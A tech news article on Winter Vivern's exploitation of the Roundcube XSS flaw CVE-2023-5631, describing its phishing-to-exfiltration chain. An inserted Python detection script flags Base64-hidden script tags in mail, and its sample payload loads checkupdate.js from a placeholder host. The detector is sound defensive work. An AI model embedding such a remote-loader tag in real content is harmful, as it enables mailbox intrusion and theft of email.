The threat actor known as Winter Vivern targeted Roundcube webmail software on Oct. 11, exploiting a zero-day vulnerability to gain unauthorized access to email messages. 

What Is the Winter Vivern Hacking Group?

[Image: Winter Vivern Russian Hacking Group Exploits Zero-Day in Roundcube Webmail Software (Photo: Kris from Pixabay). Caption: Winter Vivern exploits a zero-day flaw in the Roundcube email server.]

According to ESET Research, Winter Vivern is a Russian hacking group that has been operating since 2020. The notorious cybercriminals reportedly target governments across Central Asia and Europe.

The threat actors' operations involve launching phishing campaigns from websites, using custom PowerShell backdoors and other forms of malicious code and documents.

Previous reports claimed that Winter Vivern is connected to MoustachedBouncer, which is based in Belarus.

Recent months have witnessed the group's involvement in attacks on Ukraine, Poland, and various government entities across Europe and India.

Interestingly, this incident isn't Winter Vivern's first encounter with Roundcube. They previously targeted a different flaw, CVE-2020-35730, making them the second nation-state group, after APT28, to exploit this open-source webmail software.

The New Vulnerability: CVE-2023-5631

The specific vulnerability in this attack is CVE-2023-5631, which has a CVSS score of 5.4. This stored cross-site scripting flaw enables a remote attacker to load arbitrary JavaScript code into the software. Fortunately, a patch was released promptly on October 14, 2023.


Winter Vivern's Attack Sequence

According to The Hacker News, Winter Vivern's attack typically commences with a phishing message that includes a Base64-encoded payload within the HTML source code. Upon decoding, this payload launches a JavaScript injection from a remote server, exploiting the XSS vulnerability.

"By sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual intervention other than viewing the message in a web browser is required," ESET said.

The second-stage JavaScript, named checkupdate.js, serves as a loader, facilitating the execution of a final JavaScript payload. This payload enables the threat actor to exfiltrate email messages to a command-and-control (C2) server.
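As an added example that is not from the article, ESET or Roundcube, here is a small Python triage check for stored or gatewayed HTML mail: it decodes every long Base64 run in the body and flags any that contains a script tag, inline event handler or remote .js reference, the pattern the attack sequence above relies on. The host loader.example.invalid, the inline image and the sample message are constructed placeholders.

```python
import base64
import binascii
import re

# Constructed sample: the decoded content is a remote-script reference with a
# placeholder host; it is Base64-encoded here so the example runs offline.
_HIDDEN = base64.b64encode(
    b'<script src="https://loader.example.invalid/checkupdate.js"></script>'
).decode("ascii")
SAMPLE_HTML = (
    '<html><body><p>Quarterly report attached.</p>'
    '<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ'
    'AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==">'
    f'<div data-blob="{_HIDDEN}"></div></body></html>'
)

# Runs of Base64 text long enough to hold a tag or URL (padding optional).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Markers in decoded text that indicate script injection or a remote loader.
SCRIPT_MARKERS = re.compile(r"<script|javascript:|\bon[a-z]+\s*=|\.js\b", re.I)


def decoded_blobs(html: str):
    """Yield (blob, text) for each Base64 run that decodes to valid UTF-8."""
    for match in B64_RUN.finditer(html):
        blob = match.group(0)
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # binary (e.g. an inline image) or not really Base64
        yield blob, text


def find_hidden_script(html: str) -> list[dict]:
    """Return one finding per decoded blob that contains a script marker."""
    findings = []
    for blob, text in decoded_blobs(html):
        hit = SCRIPT_MARKERS.search(text)
        if hit:
            findings.append({"marker": hit.group(0).lower(),
                             "decoded": text, "blob_len": len(blob)})
    return findings


if __name__ == "__main__":
    for f in find_hidden_script(SAMPLE_HTML):
        print(f"marker={f['marker']!r} len={f['blob_len']} decoded={f['decoded']!r}")
```

The inline PNG is skipped because it decodes to binary rather than text, so only the hidden script reference is reported; a real deployment would feed the findings into the mail gateway's quarantine or SIEM rather than printing them.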

A Persistent Threat to European Governments

Despite Winter Vivern's relatively unsophisticated toolset, the group poses a significant threat to European governments due to its persistence, per Bleeping Computer. It regularly conducts phishing campaigns, targeting internet-facing applications known to have vulnerabilities. The concerning reality is that many of these applications remain unpatched, creating ample opportunities for exploitation.

As the security landscape continues to evolve, vigilance and timely updates are essential to mitigate the risks posed by threat actors like Winter Vivern.

Meanwhile, an early report by Tech Times said that gene-testing firm 23andMe suffered a data breach. The unknown hacker claimed that millions of records, particularly those of users with Jewish ancestry, were stolen.

The hacker also posted that the database even contained the personal information of prominent names in the tech industry, including Meta CEO Mark Zuckerberg and Tesla boss Elon Musk.


Joseph Henry

ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.